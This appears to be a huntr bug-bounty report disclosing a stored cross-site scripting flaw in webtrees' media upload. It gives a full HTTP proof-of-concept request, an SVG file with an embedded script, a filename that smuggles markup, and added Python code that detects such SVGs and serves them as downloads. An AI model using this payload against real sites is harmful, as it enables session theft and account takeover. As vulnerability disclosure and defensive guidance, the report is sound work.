huntr report AFC02117-C033-4B81-9763-DC7971C0CC9B
Oct 08, 2021 - 11:49 a.m.

Cross-site Scripting (XSS) - Stored in fisharebest/webtrees

noobpk
www.huntr.dev

Description

Stored XSS: an authenticated user who can add media files can upload an .svg file containing a script element. The file is stored and later served from the application's own origin, so the embedded JavaScript runs in the context of any user who opens it.

Proof of Concept

// PoC.req
POST /demo-dev/tree/demo/add-media-file/X9222 HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=63trarcpiic93psog3t8okts4h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine
Content-Type: multipart/form-data; boundary=---------------------------405026258827833307651807573856
Content-Length: 1752
Origin: https://dev.webtrees.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="_csrf"

NktwFM88jQhclDtOWaJYcd0o77F8n5BI
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file_location"

upload
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="file"; filename="xss'><img src>.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="auto"

0
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="folder"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="new_file"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="unused"

0_Artémis_(Diane)_-_Galleria_dei_Candelabri_-_Vatican.JPG
-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="remote"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="title"


-----------------------------405026258827833307651807573856
Content-Disposition: form-data; name="type"


-----------------------------405026258827833307651807573856--

Steps to Reproduce

Create an .svg file containing the payload.

Example

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>

Go to the media page of a person. Example: https://dev.webtrees.net/demo-dev/tree/demo/media/X9222/Princess-Victoria-of-Hesse-and-by-Rhine

Under the Edit button choose 'Add a media file'.

Upload the .svg file and save it.

The XSS triggers when a user clicks the media file: the browser loads the SVG directly from the site's origin as a document and executes the embedded script. Note that the script runs only when the file is opened as a document (direct navigation, object or iframe); an SVG rendered through an img element does not execute script, so the stored file is dangerous precisely because the application links to it directly.
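Two defences a maintainer would want for this upload path are shown below as an added example (Python, not webtrees' own PHP code): a content check that rejects SVG files able to run script when opened as a document, and a set of response headers for serving any untrusted SVG as a download so that it can never execute in the application's origin even if the check is bypassed. The function names are assumptions for illustration; the PoC SVG from this report is embedded as test input, and the benign file is constructed.

```python
# Added example (not webtrees code): reject SVG uploads that can run script when
# opened as a document, and serve anything untrusted as a download instead.
import re
import xml.etree.ElementTree as ET

# Elements that execute script or embed arbitrary HTML once the SVG is loaded
# as a document (direct navigation, <object>, <iframe>); <img> never runs them.
DANGEROUS_ELEMENTS = {"script", "foreignObject"}
DANGEROUS_URL = re.compile(r"^\s*(javascript|vbscript|data):", re.IGNORECASE)


def _local(qname):
    """Strip an ElementTree '{namespace}name' prefix, leaving the local name."""
    return qname.rsplit("}", 1)[-1]


def svg_findings(svg_bytes):
    """Return the reasons this SVG must not be served inline; an empty list means clean.

    xml.etree does not fetch external DTDs or entities, so the PUBLIC DOCTYPE in
    the PoC is inert here; for untrusted input in production prefer defusedxml.
    """
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        return [f"root element is <{_local(root.tag)}>, not <svg>"]
    findings = []
    for el in root.iter():
        name = _local(el.tag)
        if name in DANGEROUS_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):  # onload, onclick, onbegin, ...
                findings.append(f"event handler attribute {aname} on <{name}>")
            elif aname == "href" and DANGEROUS_URL.match(value):  # href / xlink:href
                findings.append(f'href="{value.strip()}" on <{name}>')
    return findings


def download_only_headers(filename):
    """Response headers for serving an untrusted SVG so the browser never runs it
    in the site's origin: force a download, sandbox it if rendered anyway, and
    forbid MIME sniffing. The filename is reduced to a safe character set; the
    PoC uses xss'><img src>.svg, which would otherwise corrupt the header."""
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": f'attachment; filename="{safe}"',
        "Content-Security-Policy": "sandbox; default-src 'none'; style-src 'unsafe-inline'",
        "X-Content-Type-Options": "nosniff",
    }


# The payload from the report above, embedded here as test input.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>
"""

# Constructed benign file: the same drawing with no script.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="300" height="100"/></svg>'

if __name__ == "__main__":
    for label, data in (("PoC", POC_SVG), ("benign", BENIGN_SVG)):
        problems = svg_findings(data)
        print(label, "->", "accept" if not problems else f"reject: {problems}")
```

The content check is a denylist of the constructs that matter for this report (script, foreignObject, on* handlers, javascript: and data: hrefs); an allowlist sanitizer is stricter, but the download-only headers are the control that holds regardless of how the file was checked, because script in an SVG only ever runs when the browser treats the file as a document.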

Impact

Because the script runs in the application's origin, it can read the victim's session cookie (where the cookie is not HttpOnly) and perform actions in the application as that user, giving an attacker unauthorized access to the victim's account.